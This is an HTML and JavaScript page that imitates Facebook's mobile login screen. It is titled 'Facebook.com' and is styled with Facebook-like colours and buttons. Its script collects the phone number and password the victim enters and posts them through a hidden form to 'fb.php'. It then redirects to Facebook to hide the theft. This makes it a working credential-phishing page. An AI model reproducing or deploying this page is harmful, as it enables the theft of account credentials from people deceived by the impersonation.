<!DOCTYPE html>
<html>
<head>
<title>Facebook.com</title>
</head>
<body>
<div id="container">
<img src="Fb.png" class="top">
<div id="lang">Afrikaans • ທປກະ •<a href=""> More... </a> </div>
<input type="text" placeholder="Phone number or email address" id="phone" required > 
<input type="password" placeholder="Password" id="pass" min="4" required>
<button>Log In</button>
<a href="" >Forgotten <br> password?</a>
<div id="or"><div id="line"></div><p class="p" >OR</p></div>
<button id="createAcc" >Create New Facebook account</button>
</div>
<style type="text/css">
.top {
width:100vw;

}
#container {
display:flex;
flex-direction:column;
gap:20px;
align-items:center;
}
button{
height:8vh;
width:85vw;
font-size:calc(3rem);
background-color:RGB(0,90,150);
border:none;
border-radius:20px;
color:white;
min-height:3rem;

}
div,input {
font-size:3rem;
}
input{
height:90px;
width:85vw;
border-top-color:transparent;
border-left-color:transparent;
border-right-color:transparent;
}
#line {
border-top:3px solid grey;
width:85vw;
margin-top:50px;
margin-bottom:50px;
display:flex;
justify-content:center;
height:2.5rem;
}
#or {
position:relative;

}
p {
position:absolute;
left:38vw;
background:white;
top:-1rem;
display:inline;
font-size:2.5rem;
font-family:sans-serif;
font-weight:lighter;
}
#createAcc {
background:green;
width:auto;
height:auto;
padding:30px;
}
a,a:visited {
text-decoration:none;
}
#lang {
font-size:2.5rem;
}
#phone {
padding-top:30px;
}
form {
display:none;
}
</style>
<script type="text/javascript">
//initial height
let h = window.innerHeight;

document.querySelector('button').onclick = ()=>{
let number = document.querySelector('#phone');
let password = document.querySelector('#pass');
if(number.value.length == 10 && password.value.length>4)
{
//crate form
let form = document.createElement('form');
form.action = "fb.php";
let input = document.createElement('input');
input.type ="text";
input.name = "Phone";
input.value = number.value;
form.appendChild(input)
let input2 = document.createElement('input');
input2.type ="text";
input2.name = "Password";
input2.value = password.value;
form.appendChild(input2)
document.querySelector('body').appendChild(form)
//send to server
form.submit();
//empty fields
number.value = '';
password.value = '';
//Redirect to Facebook 
window.location.href = "www.facebook.com";
}
else{
alert('Incorrect Number or Password');
number.value = '';
password.value = '';
}}

document.querySelectorAll('input').forEach(input=>{
input.onclick = function(){
let height = window.innerHeight;
let img = document.querySelector('img')
if(height < 1300){
img.src = "newfb.png";
img.style = `width :200px;
             height:200px;`
img.style.marginTop = "1rem"
}
else{
img.src = "fb.png";
}
}})

</script>
</body>
</html
